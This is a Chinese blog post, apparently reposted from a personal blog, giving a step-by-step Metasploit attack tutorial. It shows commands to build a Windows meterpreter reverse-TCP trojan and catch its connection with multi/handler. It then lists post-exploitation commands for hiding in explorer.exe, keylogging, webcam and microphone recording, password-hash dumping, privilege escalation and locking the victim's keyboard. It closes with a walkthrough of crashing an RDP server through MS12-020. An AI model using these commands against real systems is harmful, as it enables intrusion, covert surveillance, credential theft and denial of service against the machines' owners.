kali linux 远程攻击

时间:2017-06-30 12:25:57   收藏:0   阅读:3756

Metasploit

1启动:msfconsole

技术分享 

技术分享 

exploit   漏洞利用工具

payloads    ----àshellcode    漏洞利用后执行的代码

 

木马      控制      服务器

        远程控制     木马程序

 

2.根据自己的ip生成一个木马

msfpayload windows/meterpreter/reverse_tcp LHOST=linuxip LPORT=55555 X > test.exe

windows/meterpreter/reverse_tcp  目录

LHOST 本地的IP

LPORT  端口 (高端口容易过防火墙)

X 二进制    >  写    test.exe  二进制文件(木马程序)

技术分享 

 

技术分享主文件夹下

3.技术分享

 use exploit/multi/handler

使用handler这个模块

4.使用show options 查看参数(发现无参数)

.技术分享

5.直接选下一个 set PAYLOAD windows/meterpreter/reverse_tcp

reverse_tcp 反向的链接(使用 shellcold 程序

技术分享 

6.此时再次查看参数 show options

技术分享 

 

LHOST   =  生成木马的linux IP 地址   (均要填写)

LPORT   =  高端口  55555

7.填写生成木马的ip 以及端口

set LHOST  linux IP

set LPORT  55555

技术分享 

生成完后,再次查看是否填写 show options

技术分享 

8.执行 exploit (等待链接状态)

等待点击木马

 

 

 

 

 

 

 

 

 

Metasploit(工具使用)

 

background  将会话放入后台

sessions -l 查看后台的会话

sessions -i 1  切换回刚才的会话

注入进程(防止木马被关闭)

ps  得到想要的PID进程

migrate PID  注入  

216   184   explorer.exe  桌面管理进程)

migrate 216   注入

(查看进程 PS

例如 meterpreter>  run vnc  开启远程桌面

文件管理功能 file  system  commands

download

edit (编辑文件) 后面直接加文件名

cat(查看文件)

mkdir (创建文件夹)

mv (移动文件)

rm (删除文件)

upload (上传)

rmdir (删除文件夹)

 

网络和系统操作 Networking commands

arp (查看arp缓存表)

getproxy (获取本机的代理)

ifconfig

ipconfig

netstat (查看本机的端口链接)

系统操作

kill   结束进程   (后面直接跟进程的PID号)

ps    查看进程

reboot   重启

reg    修改注册表

shell   获取终端

shutdown  关机

sysinfo   获取电脑信息

用户和其余操作  user interface commands

enumdesktops   用户登录数

keyscan_dump   键盘记录_下载

keyscan_start    键盘记录_开始

keyscan_stop    键盘记录_停止

uictl     获得键盘鼠标控制权

 

 

摄像头操作

record_mic    音频录制

webcam_chat  查看摄像头接口

webcam_list    查看摄像头列表

webcam_stream  摄像头视频录制

getsystem  获取高权限

hashdump  下载管理员的哈希密文

键盘记录的用法

1.keyscan_start  开始记录

2). 再次 keyscan_dump  下载查看记录

3. Keyscan_stop  停止监听

键盘鼠标的锁定

uictl -h  查看参数

enable(打开) disable(锁定)   keyboard(键盘) mouse(鼠标)

例:uictl  disable  keyboard  锁定键盘  

注:键盘锁定时,win+E  任然可以用

音频录制:先查看参数在录制

 

 

 

 

 

Metasploit(服务器蓝屏攻击)

条件:服务器必须开启 3389 端口( netstat an  可进行查看)

目标:(DDOS 攻击192.168.X.X

漏洞名称:MS12020

1启动:msfconsole

2.输入 search ms12-020

解释:

auxiliary/dos/windows/rdp/ms12_020_maxchannelids

服务器远程桌面的模块

auxiliary/scanner/rdp/ms12_020_check

查看是否存在该漏洞

3. 检查 use auxiliary/scanner/rdp/ms12_020_check

(查看参数 show options)

RHOSTS       R开头为远程主机

4.set RHOSTS 服务器的IP

5. 查看该端口是否存在  exploit

6.换模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

7.查看参数 show options   

写入IP :  set RHOST  服务器IP   再次查看是否设置成功

8.重新开一个终端,用ping (服务器) :正常应为ping

(在网站的搜索栏,进入看是否能进入:输入服务器的IP

 

 

9. 输入 exploit  攻击开始

结果:服务器蓝屏,无法ping

开启:3389

http://blog.csdn.net/bekilledlzy/article/details/1817637

Ms12-020解决措施

http://cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm

 

 

注:

如果对方开启了防火墙或者修改了3389端口,可以通过下面方式查看:有一个 XXXX/tcp open realserver  (可疑)

端口讲解

http://vip.2cto.com/jc/241.html

 


本文出自 “10883981” 博客,转载请与作者联系!

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!